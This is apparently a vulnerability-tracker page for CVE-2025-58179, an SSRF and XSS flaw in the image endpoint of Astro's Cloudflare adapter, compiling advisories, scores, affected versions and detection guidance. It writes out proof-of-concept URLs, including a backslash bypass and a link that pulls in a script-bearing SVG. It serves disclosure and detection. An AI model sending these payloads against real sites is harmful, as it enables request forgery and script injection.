CVE-2025-58179
published 2025-09-05CVE-2025-58179: Astro is a web framework for content-driven websites. Versions 11.0.3 through 12.6.5 are vulnerable to SSRF when using Astro's Cloudflare adapter. When…
PriorityP279medium6.5CVSS 3.1
AVNACLPRNUINSUCLILAN
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
0.77%
51.1th percentile
Astro is a web framework for content-driven websites. Versions 11.0.3 through 12.6.5 are vulnerable to SSRF when using Astro's Cloudflare adapter. When configured with output: 'server' while using the default imageService: 'compile', the generated image optimization endpoint doesn't check the URLs it receives, allowing content from unauthorized third-party domains to be served. a A bug in impacted versions of the @astrojs/cloudflare adapter for deployment on Cloudflare’s infrastructure, allows an attacker to bypass the third-party domain restrictions and serve any content from the vulnerable origin. This issue is fixed in version 12.6.6.
Affected
5 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| astro | astro | >= 5.13.4 < 5.13.10 | 5.13.10 |
| astro | astro | >= 5.13.4 < 5.13.10 | 5.13.10 |
| astro | astrojs_cloudflare | >= 11.0.3 < 12.6.6 | 12.6.6 |
| astrojs | cloudflare | >= 11.0.3 < 12.6.6 | 12.6.6 |
| withastro | astrojs_cloudflare | < 13.1.10 | 13.1.10 |
Detection & IOCsextracted from sources · hover to see the quote
url{{BaseURL}}/_image?href=https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/refs/heads/main/helpers/payloads/retool-xss.svg&f=svg↗
- →Probe the /_image endpoint with an external href parameter pointing to an SVG containing JavaScript. A vulnerable instance will fetch and return the SVG with Content-Type: image/svg+xml and body containing '<script type="text/javascript' and 'alert(document.domain);'. ↗
- →Match HTTP 200 response with Content-Type 'image/svg+xml' AND body containing both '<script type="text/javascript' and 'alert(document.domain);' to confirm successful SSRF/XSS via the image optimization endpoint. ↗
- →Vulnerability is triggered when the Astro Cloudflare adapter is configured with output: 'server' and the default imageService: 'compile'. The /_image endpoint accepts arbitrary external URLs via the 'href' query parameter without domain validation. ↗
- →CVE-2025-59837 is a related bypass of the same image proxy domain validation using backslashes in the href parameter; detections for CVE-2025-58179 should also consider backslash-based bypass variants (e.g., /_image?href=https:\\evil.com/...). ↗
- ·Vulnerability only affects @astrojs/cloudflare adapter versions 11.0.3 through 12.6.5; the fix is present in version 12.6.6 and later. ↗
- ·Exploitation requires the Astro application to be deployed with both output: 'server' and the default imageService: 'compile' configuration; other configurations are not affected. ↗
- ·CVE-2025-58179's fix was incomplete; CVE-2025-59837 (fixed in Astro 5.13.10) describes a bypass of the same domain validation using backslashes in the href parameter. ↗
CVSS provenance
nvdv3.16.5MEDIUMCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
ghsa6.5MEDIUM
osv6.5MEDIUM
vulncheck6.5MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
OSV
Astro's bypass of image proxy domain validation leads to SSRF and potential XSS
osv·2025-10-28·CVSS 6.5
CVE-2025-59837 [MEDIUM] Astro's bypass of image proxy domain validation leads to SSRF and potential XSS
Astro's bypass of image proxy domain validation leads to SSRF and potential XSS
### Summary
This is a patch bypass of CVE-2025-58179 in commit [9ecf359](https://github.com/withastro/astro/commit/9ecf3598e2b29dd74614328fde3047ea90e67252). The fix blocks `http://`, `https://` and `//`, but can be bypassed using backslashes (`\`) - the endpoint still issues a server-side fetch.
### PoC
[https://astro.build/_image?href=\\raw.githubusercontent.com/projectdiscovery/nuclei-templates/refs/heads/main/helpers/payloads/retool-xss.svg&f=svg](https://astro.build/_image?href=%5C%5Craw.githubusercontent.com/projectdiscovery/nuclei-templates/refs/heads/main/helpers/payloads/retool-xss.svg&f=svg)
GHSA
Astro's bypass of image proxy domain validation leads to SSRF and potential XSS
ghsa·2025-10-28·CVSS 6.5
CVE-2025-59837 [MEDIUM] CWE-79 Astro's bypass of image proxy domain validation leads to SSRF and potential XSS
Astro's bypass of image proxy domain validation leads to SSRF and potential XSS
### Summary
This is a patch bypass of CVE-2025-58179 in commit [9ecf359](https://github.com/withastro/astro/commit/9ecf3598e2b29dd74614328fde3047ea90e67252). The fix blocks `http://`, `https://` and `//`, but can be bypassed using backslashes (`\`) - the endpoint still issues a server-side fetch.
### PoC
[https://astro.build/_image?href=\\raw.githubusercontent.com/projectdiscovery/nuclei-templates/refs/heads/main/helpers/payloads/retool-xss.svg&f=svg](https://astro.build/_image?href=%5C%5Craw.githubusercontent.com/projectdiscovery/nuclei-templates/refs/heads/main/helpers/payloads/retool-xss.svg&f=svg)
OSV
Server-Side Request Forgery via /_image endpoint in Astro Cloudflare adapter
osv·2025-09-04
CVE-2025-58179 [HIGH] Server-Side Request Forgery via /_image endpoint in Astro Cloudflare adapter
Server-Side Request Forgery via /_image endpoint in Astro Cloudflare adapter
### Summary
When using Astro's Cloudflare adapter (`@astrojs/cloudflare`) configured with `output: 'server'` while using the default `imageService: 'compile'`, the generated image optimization endpoint doesn't check the URLs it receives, allowing content from unauthorized third-party domains to be served.
### Details
On-demand rendered sites built with Astro include an `/_image` endpoint, which returns optimized versions of images.
The `/_image` endpoint is restricted to processing local images bundled with the site and also supports remote images from domains the site developer has manually authorized (using the [`image.domains`](https://docs.astro.build/en/reference/configuration-reference/#imagedomains) or
GHSA
Server-Side Request Forgery via /_image endpoint in Astro Cloudflare adapter
ghsa·2025-09-04
CVE-2025-58179 [HIGH] CWE-918 Server-Side Request Forgery via /_image endpoint in Astro Cloudflare adapter
Server-Side Request Forgery via /_image endpoint in Astro Cloudflare adapter
### Summary
When using Astro's Cloudflare adapter (`@astrojs/cloudflare`) configured with `output: 'server'` while using the default `imageService: 'compile'`, the generated image optimization endpoint doesn't check the URLs it receives, allowing content from unauthorized third-party domains to be served.
### Details
On-demand rendered sites built with Astro include an `/_image` endpoint, which returns optimized versions of images.
The `/_image` endpoint is restricted to processing local images bundled with the site and also supports remote images from domains the site developer has manually authorized (using the [`image.domains`](https://docs.astro.build/en/reference/configuration-reference/#imagedomains) or
VulnCheck
astro \@astrojs\/cloudflare Server-Side Request Forgery (SSRF)
vulncheck·2025·CVSS 6.5
CVE-2025-58179 [MEDIUM] astro \@astrojs\/cloudflare Server-Side Request Forgery (SSRF)
astro \@astrojs\/cloudflare Server-Side Request Forgery (SSRF)
Astro is a web framework for content-driven websites. Versions 11.0.3 through 12.6.5 are vulnerable to SSRF when using Astro's Cloudflare adapter. When configured with output: 'server' while using the default imageService: 'compile', the generated image optimization endpoint doesn't check the URLs it receives, allowing content from unauthorized third-party domains to be served. a A bug in impacted versions of the @astrojs/cloudflare adapter for deployment on Cloudflare’s infrastructure, allows an attacker to bypass the third-party domain restrictions and serve any content from the vulnerable origin. This issue is fixed in version 12.6.6.
Affected: astro \@astrojs\/cloudflare
Required Action: Apply remediations or mitigations
No detection rules found.
Nuclei
Astro Cloudflare Adapter - Server Side Request Forgery
nuclei·CVSS 6.5
CVE-2025-58179 [MEDIUM] Astro Cloudflare Adapter - Server Side Request Forgery
Astro Cloudflare Adapter - Server Side Request Forgery
Astro is a web framework for content-driven websites. Versions 11.0.3 through 12.6.5 are vulnerable to SSRF when using Astro's Cloudflare adapter. When configured with output: 'server' while using the default imageService: 'compile', the generated image optimization endpoint doesn't check the URLs it receives, allowing content from unauthorized third-party domains to be served. a A bug in impacted versions of the @astrojs/cloudflare adapter for deployment on Cloudflare’s infrastructure, allows an attacker to bypass the third-party domain restrictions and serve any content from the vulnerable origin.
Template:
id: CVE-2025-58179
info:
name: Astro Cloudflare Adapter - Server Side Request Forgery
author: HoangAnhThai
severity: high
de
No writeups or analysis indexed.
2025-09-05
Published
Exploited in the wild